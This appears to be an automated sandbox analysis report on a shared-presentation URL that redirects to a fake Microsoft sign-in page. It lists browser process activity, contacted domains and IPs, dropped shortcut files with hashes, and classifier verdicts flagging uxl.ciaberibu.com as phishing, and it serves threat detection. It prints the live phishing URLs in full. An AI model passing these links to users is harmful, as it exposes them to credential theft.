      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1988,i,14439112051146858894,12483337357495976748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1988,i,14439112051146858894,12483337357495976748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      1
      Process Injection
      3
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://decktop.us/LFzs8Q0%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      decktop.us
      44.216.113.21
      truefalse
        unknown
        ws.gleap.io
        157.230.79.42
        truefalse
          unknown
          fastly-tls12-bam.nr-data.net
          162.247.243.29
          truefalse
            unknown
            tls13.taboola.map.fastly.net
            151.101.193.44
            truefalse
              unknown
              apiv21.decktopus.com
              54.237.77.203
              truefalse
                unknown
                us-assets.i.posthog.com
                104.22.58.181
                truefalse
                  unknown
                  events.launchdarkly.com
                  35.171.73.226
                  truefalse
                    unknown
                    stats.g.doubleclick.net
                    108.177.15.157
                    truefalse
                      unknown
                      ipapi.co
                      104.26.9.44
                      truefalse
                        unknown
                        scontent.xx.fbcdn.net
                        157.240.0.6
                        truefalse
                          unknown
                          dualstack.tls13.taboola.map.fastly.net
                          151.101.193.44
                          truefalse
                            unknown
                            code.jquery.com
                            151.101.66.137
                            truefalse
                              unknown
                              cdnjs.cloudflare.com
                              104.17.25.14
                              truefalse
                                unknown
                                www.google.com
                                142.250.184.196
                                truefalse
                                  unknown
                                  api.gleap.io
                                  67.207.79.245
                                  truefalse
                                    unknown
                                    am-vip001.taboola.com
                                    141.226.228.48
                                    truefalse
                                      unknown
                                      httpbin.org
                                      54.87.89.151
                                      truefalse
                                        unknown
                                        txp.devituarf.su
                                        172.67.196.189
                                        truefalse
                                          unknown
                                          star-mini.c10r.facebook.com
                                          157.240.253.35
                                          truefalse
                                            unknown
                                            a.nel.cloudflare.com
                                            35.190.80.1
                                            truefalse
                                              unknown
                                              github.com
                                              140.82.121.3
                                              truefalse
                                                unknown
                                                clientstream-ga.launchdarkly.com
                                                13.248.151.210
                                                truefalse
                                                  unknown
                                                  uxl.ciaberibu.com
                                                  104.21.64.239
                                                  truetrue
                                                    unknown
                                                    js-agent.newrelic.com
                                                    162.247.243.39
                                                    truefalse
                                                      unknown
                                                      us-cds.taboola.com
                                                      141.226.224.32
                                                      truefalse
                                                        unknown
                                                        domains.rewardful.com
                                                        161.35.235.194
                                                        truefalse
                                                          unknown
                                                          app.decktopus.com
                                                          18.239.18.112
                                                          truefalse
                                                            unknown
                                                            analytics-alv.google.com
                                                            216.239.34.181
                                                            truefalse
                                                              unknown
                                                              yeqni.jaishict.ru
                                                              188.114.97.3
                                                              truefalse
                                                                unknown
                                                                googleads.g.doubleclick.net
                                                                142.250.184.194
                                                                truefalse
                                                                  unknown
                                                                  d2vgu95hoyrpkh.cloudfront.net
                                                                  3.161.119.44
                                                                  truefalse
                                                                    unknown
                                                                    challenges.cloudflare.com
                                                                    104.18.95.41
                                                                    truefalse
                                                                      unknown
                                                                      posthog-ingress-prod-us-256455477.us-east-1.elb.amazonaws.com
                                                                      52.202.246.4
                                                                      truefalse
                                                                        unknown
                                                                        td.doubleclick.net
                                                                        172.217.18.2
                                                                        truefalse
                                                                          unknown
                                                                          d19d360lklgih4.cloudfront.net
                                                                          13.33.187.120
                                                                          truefalse
                                                                            unknown
                                                                            objects.githubusercontent.com
                                                                            185.199.110.133
                                                                            truefalse
                                                                              unknown
                                                                              cfv21.decktopus.com
                                                                              18.239.36.120
                                                                              truefalse
                                                                                unknown
                                                                                us.i.posthog.com
                                                                                unknown
                                                                                unknownfalse
                                                                                  unknown
                                                                                  psb.taboola.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    unknown
                                                                                    affiliate.decktopus.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      unknown
                                                                                      cdn.socket.io
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        unknown
                                                                                        trc-events.taboola.com
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          unknown
                                                                                          cds.taboola.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            unknown
                                                                                            clientstream.launchdarkly.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              unknown
                                                                                              www.facebook.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                unknown
                                                                                                app.launchdarkly.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  unknown
                                                                                                  www.linkedin.com
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    unknown
                                                                                                    trc.taboola.com
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      unknown
                                                                                                      connect.facebook.net
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        unknown
                                                                                                        px.ads.linkedin.com
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          unknown
                                                                                                          bam.nr-data.net
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            unknown
                                                                                                            snap.licdn.com
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              unknown
                                                                                                              cdn.taboola.com
                                                                                                              unknown
                                                                                                              unknownfalse
                                                                                                                unknown
                                                                                                                analytics.google.com
                                                                                                                unknown
                                                                                                                unknownfalse
                                                                                                                  unknown
                                                                                                                  ok4static.oktacdn.com
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    unknown
                                                                                                                    pips.taboola.com
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      unknown
                                                                                                                      NameMaliciousAntivirus DetectionReputation
                                                                                                                      https://app.decktopus.com/share/LFzs8Q/1false
                                                                                                                        unknown
                                                                                                                        https://td.doubleclick.net/td/ga/rul?tid=G-RDRSM8WPZJ&gacid=64488684.1722285387&gtm=45je47o0v893194734z8830215601za200zb830215601&dma=0&gcd=13l3l3l3l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&z=1908596202false
                                                                                                                          unknown
                                                                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/o3bwv/0x4AAAAAAAeneXHBKz1ieQ22/auto/fbE/normal/auto/false
                                                                                                                            unknown
                                                                                                                            https://uxl.ciaberibu.com/8knW2ib/true
                                                                                                                              unknown
                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs
                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              35.171.73.226
                                                                                                                              events.launchdarkly.comUnited States
                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                              108.177.15.157
                                                                                                                              stats.g.doubleclick.netUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              142.250.74.206
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              216.239.34.181
                                                                                                                              analytics-alv.google.comUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              104.22.58.181
                                                                                                                              us-assets.i.posthog.comUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              54.87.89.151
                                                                                                                              httpbin.orgUnited States
                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                              151.101.130.137
                                                                                                                              unknownUnited States
                                                                                                                              54113FASTLYUSfalse
                                                                                                                              18.245.31.5
                                                                                                                              unknownUnited States
                                                                                                                              16509AMAZON-02USfalse
                                                                                                                              185.199.109.133
                                                                                                                              unknownNetherlands
                                                                                                                              54113FASTLYUSfalse
                                                                                                                              54.236.77.93
                                                                                                                              unknownUnited States
                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                              151.101.66.137
                                                                                                                              code.jquery.comUnited States
                                                                                                                              54113FASTLYUSfalse
                                                                                                                              142.250.184.227
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              35.190.80.1
                                                                                                                              a.nel.cloudflare.comUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              44.216.113.21
                                                                                                                              decktop.usUnited States
                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                              151.101.193.44
                                                                                                                              tls13.taboola.map.fastly.netUnited States
                                                                                                                              54113FASTLYUSfalse
                                                                                                                              142.250.184.196
                                                                                                                              www.google.comUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              142.250.186.34
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              142.250.186.78
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              1.1.1.1
                                                                                                                              unknownAustralia
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              13.248.151.210
                                                                                                                              clientstream-ga.launchdarkly.comUnited States
                                                                                                                              16509AMAZON-02USfalse
                                                                                                                              52.202.246.4
                                                                                                                              posthog-ingress-prod-us-256455477.us-east-1.elb.amazonaws.comUnited States
                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                              142.250.184.194
                                                                                                                              googleads.g.doubleclick.netUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              172.217.18.3
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              104.18.95.41
                                                                                                                              challenges.cloudflare.comUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              67.207.79.245
                                                                                                                              api.gleap.ioUnited States
                                                                                                                              14061DIGITALOCEAN-ASNUSfalse
                                                                                                                              172.217.18.2
                                                                                                                              td.doubleclick.netUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              151.101.1.44
                                                                                                                              unknownUnited States
                                                                                                                              54113FASTLYUSfalse
                                                                                                                              13.107.42.14
                                                                                                                              unknownUnited States
                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                              239.255.255.250
                                                                                                                              unknownReserved
                                                                                                                              unknownunknownfalse
                                                                                                                              188.114.97.3
                                                                                                                              yeqni.jaishict.ruEuropean Union
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              151.101.65.44
                                                                                                                              unknownUnited States
                                                                                                                              54113FASTLYUSfalse
                                                                                                                              172.217.23.100
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              172.67.196.189
                                                                                                                              txp.devituarf.suUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              34.228.139.219
                                                                                                                              unknownUnited States
                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                              157.240.253.35
                                                                                                                              star-mini.c10r.facebook.comUnited States
                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                              142.250.186.100
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              142.250.184.238
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              216.58.212.163
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              104.17.25.14
                                                                                                                              cdnjs.cloudflare.comUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              18.244.155.72
                                                                                                                              unknownUnited States
                                                                                                                              16509AMAZON-02USfalse
                                                                                                                              104.26.8.44
                                                                                                                              unknownUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              18.239.18.112
                                                                                                                              app.decktopus.comUnited States
                                                                                                                              16509AMAZON-02USfalse
                                                                                                                              142.250.186.174
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              104.18.94.41
                                                                                                                              unknownUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              104.21.64.239
                                                                                                                              uxl.ciaberibu.comUnited States
                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                              142.250.185.168
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              142.250.181.234
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              142.250.185.202
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              3.161.119.44
                                                                                                                              d2vgu95hoyrpkh.cloudfront.netUnited States
                                                                                                                              16509AMAZON-02USfalse
                                                                                                                              157.240.0.6
                                                                                                                              scontent.xx.fbcdn.netUnited States
                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                              54.237.77.203
                                                                                                                              apiv21.decktopus.comUnited States
                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                              104.21.34.26
                                                                                                                              unknownUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              2.19.126.143
                                                                                                                              unknownEuropean Union
                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                              151.101.194.217
                                                                                                                              unknownUnited States
                                                                                                                              54113FASTLYUSfalse
                                                                                                                              13.224.189.4
                                                                                                                              unknownUnited States
                                                                                                                              16509AMAZON-02USfalse
                                                                                                                              141.226.228.48
                                                                                                                              am-vip001.taboola.comIsrael
                                                                                                                              200478TABOOLA-ASILfalse
                                                                                                                              161.35.235.194
                                                                                                                              domains.rewardful.comUnited States
                                                                                                                              14061DIGITALOCEAN-ASNUSfalse
                                                                                                                              44.207.203.25
                                                                                                                              unknownUnited States
                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                              162.247.243.39
                                                                                                                              js-agent.newrelic.comUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              185.199.110.133
                                                                                                                              objects.githubusercontent.comNetherlands
                                                                                                                              54113FASTLYUSfalse
                                                                                                                              142.250.74.195
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              142.250.110.84
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              104.17.24.14
                                                                                                                              unknownUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              157.230.79.42
                                                                                                                              ws.gleap.ioUnited States
                                                                                                                              14061DIGITALOCEAN-ASNUSfalse
                                                                                                                              216.58.212.132
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              13.33.187.120
                                                                                                                              d19d360lklgih4.cloudfront.netUnited States
                                                                                                                              16509AMAZON-02USfalse
                                                                                                                              216.58.206.67
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              140.82.121.3
                                                                                                                              github.comUnited States
                                                                                                                              36459GITHUBUSfalse
                                                                                                                              142.250.185.136
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              104.26.9.44
                                                                                                                              ipapi.coUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              142.250.185.170
                                                                                                                              unknownUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              151.101.129.44
                                                                                                                              unknownUnited States
                                                                                                                              54113FASTLYUSfalse
                                                                                                                              151.101.2.217
                                                                                                                              unknownUnited States
                                                                                                                              54113FASTLYUSfalse
                                                                                                                              157.240.253.1
                                                                                                                              unknownUnited States
                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                              162.247.243.29
                                                                                                                              fastly-tls12-bam.nr-data.netUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              141.226.224.32
                                                                                                                              us-cds.taboola.comIsrael
                                                                                                                              200478TABOOLA-ASILfalse
                                                                                                                              18.239.36.120
                                                                                                                              cfv21.decktopus.comUnited States
                                                                                                                              16509AMAZON-02USfalse
                                                                                                                              IP
                                                                                                                              192.168.2.17
                                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                              Analysis ID:1484314
                                                                                                                              Start date and time:2024-07-29 22:35:35 +02:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                              Sample URL:https://decktop.us/LFzs8Q
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                              Number of analysed new started processes analysed:19
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • EGA enabled
                                                                                                                              Analysis Mode:stream
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal80.phis.win@19/98@162/706
                                                                                                                              • Exclude process from analysis (whitelisted): SIHClient.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.184.227, 142.250.186.174, 142.250.110.84, 34.104.35.123
                                                                                                                              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • VT rate limit hit for: https://decktop.us/LFzs8Q
                                                                                                                              InputOutput
                                                                                                                              URL: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4zi Model: Perplexity: mixtral-8x7b-instruct
                                                                                                                              {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and phone numbers.","There is no sense of urgency in the text.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                                                                                                              Title: Equity Return Maximization OCR: .1 Microsoft Sign in E-mail, phone, or Skype Nc eccaunt? Create one! Can't access yaur account? Next Sign-in options TErms of USE privacy & cookies 
                                                                                                                              URL: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4zi Model: gpt-4o
                                                                                                                              ```json
                                                                                                                              {
                                                                                                                                "phishing_score": 9,
                                                                                                                                "brands": "Microsoft",
                                                                                                                                "phishing": true,
                                                                                                                                "suspicious_domain": true,
                                                                                                                                "has_prominent_loginform": true,
                                                                                                                                "has_captcha": false,
                                                                                                                                "setechniques": true,
                                                                                                                                "has_suspicious_link": true,
                                                                                                                                "legitmate_domain": "microsoft.com",
                                                                                                                                "reasons": "The URL 'https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4zi' is highly suspicious. It does not match the legitimate domain 'microsoft.com' associated with Microsoft. The URL structure is complex and contains random strings, which is a common tactic used in phishing attacks. The webpage displays a prominent login form asking for email, phone, or Skype credentials, which is another common phishing tactic. There is no CAPTCHA present, which is often used in legitimate sites to prevent automated attacks. The presence of social engineering techniques, such as mimicking the Microsoft login page, further indicates that this is a phishing site."
                                                                                                                              }
                                                                                                                              URL: https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4zi Model: custom
                                                                                                                              {"phishing_score": 10, "brand_name": "Microsoft", "reasons": "The domain 'uxl.ciaberibu.com' is not associated with Microsoft, and the design is simple and minimalistic, but the domain is unusual and does not appear to be a legitimate Microsoft login page. The webpage appears to be a phishing attempt using Microsoft's branding to trick users into providing their login information."}
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 19:36:10 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2677
                                                                                                                              Entropy (8bit):3.995148092277475
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:F4B6A9C9EDA2C878A0B9E46CD99C89F8
                                                                                                                              SHA1:02BA3CB7E08383AFFB14DA2106FB41D69D0C8E7C
                                                                                                                              SHA-256:30BD0F2124D9FC414E8C03207466CDD16BDE177F45EEDF9C5138315076BD2BE1
                                                                                                                              SHA-512:A4096027B95BE408A591650A24802379FFF0C326CC41C0D53F849F3E53D6CB61357371BBE7FA3B2EC7E990D6CFBA3329A9295023081C3F33F3B2F1B3732F131A
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:L..................F.@.. ...$+.,....Au'.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xy.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........".fn.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 19:36:09 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2679
                                                                                                                              Entropy (8bit):4.007338172193052
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:54E8C04380E6D88FC46EE616DF3849FB
                                                                                                                              SHA1:2AEAE77CA5512461D11450824E0DBB3C43CC3598
                                                                                                                              SHA-256:FE15570D07327AD489514E91DA02B2946F549CDCD65A27B7E43EF5C79FA7CF19
                                                                                                                              SHA-512:35385E2C751A52BD88CA6354ED5DBD77447B6E10CE68839B7750606C8903D0AC3E6BE0343D4D7FF93B112BC6141375EA2227EC94514987AB219416C01A620BF2
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:L..................F.@.. ...$+.,................y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xy.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........".fn.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2693
                                                                                                                              Entropy (8bit):4.018208175704005
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:5253820CF44882F09B4842F05050A15C
                                                                                                                              SHA1:C2FC3E967AB8055E45245B6AF1E14543CEF87F88
                                                                                                                              SHA-256:2E64509948B4D30A79982CAE87E7648F1B41084D86DD0763DCD559DE4FC8DC37
